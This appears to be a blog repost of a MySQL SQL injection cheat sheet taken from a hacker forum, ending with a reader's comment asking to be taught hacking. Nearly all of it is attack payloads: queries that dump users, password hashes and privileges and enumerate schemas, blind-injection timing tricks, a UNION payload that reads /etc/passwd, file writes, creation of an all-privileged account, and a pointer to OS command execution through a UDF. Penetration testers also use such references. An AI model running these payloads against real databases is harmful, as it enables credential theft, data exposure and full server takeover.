MySQL SQLi Cheat Sheet
-------------------
Version
-------------------
SELECT @@version
------------------------
Comments
------------------------
SELECT 1; #comment
SELECT /*comment*/1;
--------------------------
Current User
-------------------------
SELECT user();
SELECT system_user();
---------------------------------------
List Users
---------------------------------------
SELECT user FROM mysql.user; -- priv
---------------------------------------
List Password Hashes
---------------------------------------
SELECT host, user, password FROM mysql.user; -- priv
---------------------------------------
List Privileges
---------------------------------------
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; -- list user privs
SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; -- priv, list user privs
SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; -- list privs on databases (schemas)
SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; -- list privs on columns
---------------------------------------
List DBA Accounts
---------------------------------------
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER';
SELECT host, user FROM mysql.user WHERE Super_priv = 'Y'; # priv
---------------------------------------
Current Database
---------------------------------------
SELECT database()
---------------------------------------
List Databases
---------------------------------------
SELECT schema_name FROM information_schema.schemata; -- for MySQL >= v5.0
SELECT distinct(db) FROM mysql.db -- priv
---------------------------------------
List Columns
---------------------------------------
SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
---------------------------------------
List Tables
---------------------------------------
SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
---------------------------------------
Find Tables From Column Name
---------------------------------------
SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username'; -- find table which have a column called 'username'
--------------------------------------
Select Nth Row
-------------------------------------
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0
--------------------------------------
Select Nth Char
-------------------------------------
SELECT substr('abcd', 3, 1); # returns c
--------------------------------------
Bitwise AND
-------------------------------------
SELECT 6 & 2; # returns 2
SELECT 6 & 1; # returns 0
--------------------------------------
ASCII Value -> Char
-------------------------------------
SELECT char(65); # returns A
--------------------------------------
Char -> ASCII Value
-------------------------------------
SELECT ascii('A'); # returns 65
--------------------------------------
Casting
-------------------------------------
SELECT cast('1' AS unsigned integer);
SELECT cast('123' AS char);
--------------------------------------
String Concatenation
-------------------------------------
SELECT CONCAT('A','B'); #returns AB
SELECT CONCAT('A','B','C'); # returns ABC
-------------------------------------
If Statement
-------------------------------------
SELECT if(1=1,'foo','bar'); -- returns 'foo'
-------------------------------------
Case Statement
-------------------------------------
SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # returns A
-------------------------------------
Avoiding Quotes
-------------------------------------
SELECT 0x414243; # returns ABC
-------------------------------------
Time Delay
-------------------------------------
SELECT BENCHMARK(1000000,MD5('A'));
SELECT SLEEP(5); # >= 5.0.12
-------------------------------------
Make DNS Requests
-------------------------------------
null
-------------------------------------
Command Execution
-------------------------------------
If mysqld (<5.0) is running as root AND you compromise a DBA account you can execute OS commands by uploading a shared object file into /usr/lib (or similar). The .so file should contain a User Defined Function (UDF). raptor_udf.c explains exactly how you go about this. Remember to compile for the target architecture which may or may not be the same as your attack platform.
-------------------------------------
Local File Access
-------------------------------------
...' UNION ALL SELECT LOAD_FILE('/etc/passwd') -- priv, can only read world-readable files.
SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; -- priv, write to file system
-------------------------------------
Hostname, IP Address
-------------------------------------
null
-------------------------------------
Create Users
-------------------------------------
CREATE USER test1 IDENTIFIED BY 'pass1'; -- priv
-------------------------------------
Delete Users
-------------------------------------
DROP USER test1; -- priv
-------------------------------------
Make User DBA
-------------------------------------
GRANT ALL PRIVILEGES ON *.* TO test1@'%'; -- priv
-------------------------------------
Location of DB files
-------------------------------------
SELECT @@datadir;
-------------------------------------
Default/System Databases
-------------------------------------
information_schema (>= mysql 5.0)
mysql
Ref : http://www.indonesianhacker.or.id/threads/3422-MySQL-SQLi-Cheat-Sheet
hi iam interested to learn hacking can u plz teach me some thing. i am a software and web developer using php and MySQL.
BalasHapusthis is my email id please give ur email id to contact u